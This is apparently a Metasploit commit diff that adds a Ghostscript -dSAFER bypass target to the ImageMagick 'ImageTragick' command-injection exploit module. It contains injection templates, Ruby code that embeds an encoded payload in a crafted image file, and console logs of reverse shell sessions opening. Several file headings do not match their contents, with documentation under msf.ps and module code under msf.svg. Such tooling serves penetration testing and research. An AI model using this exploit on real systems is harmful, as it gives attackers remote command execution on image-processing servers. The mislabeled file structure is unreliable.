Land rapid7#7439, Add Ghostscript support to ImageMagick Exploit

Author: dmohanty-r7

data/exploits/imagemagick/delegate/msf.miff

@@ -3,6 +3,6 @@ encoding "UTF-8"
 viewbox 0 0 1 1
 affine 1 0 0 1 0 0
 push graphic-context
-image Over 0,0 1,1 'https://localhost";echo vulnerable"'
+image Over 0,0 1,1 'https://localhost";echo vulnerable > /dev/tty"'
 pop graphic-context
 pop graphic-context

data/exploits/imagemagick/delegate/msf.mvg

@@ -3,6 +3,6 @@ encoding "UTF-8"
 viewbox 0 0 1 1
 affine 1 0 0 1 0 0
 push graphic-context
-image Over 0,0 1,1 '|touch vulnerable'
+image Over 0,0 1,1 '|echo vulnerable > /dev/tty'
 pop graphic-context
 pop graphic-context

data/exploits/imagemagick/delegate/msf.ps

@@ -0,0 +1,54 @@
+## Vulnerable Application
+
+  ImageMagick
+
+## Verification Steps
+
+  Example steps in this format:
+
+  1. Install the ImageMagick
+  2. Start msfconsole
+  3. Do: ```use exploits/unix/fileformat/imagemagick_delegate```
+  4. Do: ```run```
+  5. convert msf.png msf.jpg
+
+## Options
+
+  **USE_POPEN**
+
+  When the default option `true` is used, targets 0 (SVG file) and 1 (MVG file) are valid
+  When the option is set to `false`, target 2 (PS file) is valid
+
+## Scenarios
+
+## popen=true
+  ```
+  msf exploit(imagemagick_delegate) > set target 0
+  msf exploit(imagemagick_delegate) > run
+
+  [*] Started reverse TCP handler on 1.1.1.1:4444
+  [+] msf.png stored at /Users/dmohanty/.msf4/local/msf.png
+  [*] Command shell session 1 opened (1.1.1.11:4444 -> 1.1.1.1:57212) at 2016-10-28 12:47:06 -0500
+  ```
+
+  ```
+  msf exploit(imagemagick_delegate) > set target 1
+  msf exploit(imagemagick_delegate) > run
+
+  [*] Started reverse TCP handler on 10.6.0.186:4444
+  [+] msf.png stored at /Users/dmohanty/.msf4/local/msf.png
+  [*] Command shell session 2 opened (1.1.1.1:4444 -> 1.1.1.1:64308) at 2016-10-28 15:48:40 -0500
+  ```
+
+## popen=false
+  ```
+  msf exploit(imagemagick_delegate) > set target 2
+  target => 2
+  msf exploit(imagemagick_delegate) > set USE_POPEN false
+  USE_POPEN => false
+  msf exploit(imagemagick_delegate) > run
+
+  [*] Started reverse TCP handler on 1.1.1.1:4444
+  [+] msf.png stored at /Users/dmohanty/.msf4/local/msf.png
+  [*] Command shell session 5 opened (1.1.1.1:4444 -> 1.1.1.1:64772) at 2016-10-28 15:58:03 -0500
+  ```

data/exploits/imagemagick/delegate/msf.svg

@@ -21,11 +21,12 @@ def initialize(info = {})
         a .png (for example) which is actually a crafted SVG (for example) that
         triggers the command injection.
 
-        Tested on Linux, BSD, and OS X. You'll want to choose your payload
-        carefully due to portability concerns. Use cmd/unix/generic if need be.
+        The PostScript (PS) target leverages a Ghostscript -dSAFER bypass
+        (discovered by taviso) to achieve RCE in the Ghostscript delegate.
+        Ghostscript versions 9.18 and later are affected.
 
-        If ImageMagick supports popen(), a |-prefixed command will be used for
-        the exploit. No delegates are involved in this exploitation.
+        If USE_POPEN is set to true, a |-prefixed command will be used for the
+        exploit. No delegates are involved in this exploitation.
       },
       'Author'          => [
         'stewie',            # Vulnerability discovery
@@ -35,8 +36,10 @@ def initialize(info = {})
       ],
       'References'      => [
         %w{CVE 2016-3714},
+        %w{CVE 2016-7976},
         %w{URL https://imagetragick.com/},
         %w{URL http://seclists.org/oss-sec/2016/q2/205},
+        %w{URL http://seclists.org/oss-sec/2016/q3/682},
         %w{URL https://github.com/ImageMagick/ImageMagick/commit/06c41ab},
         %w{URL https://github.com/ImageMagick/ImageMagick/commit/a347456},
         %w{URL http://permalink.gmane.org/gmane.comp.security.oss.general/19669}
@@ -54,9 +57,9 @@ def initialize(info = {})
         }
       },
       'Targets'         => [
-        ['SVG file',  template: 'msf.svg'], # convert msf.png msf.svg
-        ['MVG file',  template: 'msf.mvg'], # convert msf.svg msf.mvg
-        ['MIFF file', template: 'msf.miff'] # convert -label "" msf.svg msf.miff
+        ['SVG file', template: 'msf.svg'], # convert msf.png msf.svg
+        ['MVG file', template: 'msf.mvg'], # convert msf.svg msf.mvg
+        ['PS file',  template: 'msf.ps']   # PoC from taviso
       ],
       'DefaultTarget'   => 0,
       'DefaultOptions'  => {
@@ -69,7 +72,7 @@ def initialize(info = {})
 
     register_options([
       OptString.new('FILENAME', [true, 'Output file', 'msf.png']),
-      OptBool.new('HAVE_POPEN', [false, 'popen() support', true])
+      OptBool.new('USE_POPEN',  [false, 'Use popen() vector', true])
     ])
   end
 
@@ -80,19 +83,24 @@ def exploit
       p = payload.encoded
     end
 
-    if datastore['HAVE_POPEN']
-      file_create(template.sub('touch vulnerable', p))
-    else
-      file_create(template.sub('echo vulnerable', p))
-    end
+    file_create(template.sub('echo vulnerable > /dev/tty', p))
   end
 
   def template
-    File.read(File.join(
-      Msf::Config.data_directory, 'exploits', 'imagemagick',
-      datastore['HAVE_POPEN'] ? 'popen' : 'delegate',
-      target[:template]
-    ))
+    if datastore['USE_POPEN']
+      t = 'popen'
+    else
+      t = 'delegate'
+    end
+
+    begin
+      File.read(File.join(
+        Msf::Config.data_directory, 'exploits', 'imagemagick', t,
+        target[:template]
+      ))
+    rescue Errno::ENOENT
+      fail_with(Failure::BadConfig, "Target has no #{t} support")
+    end
   end
 
 end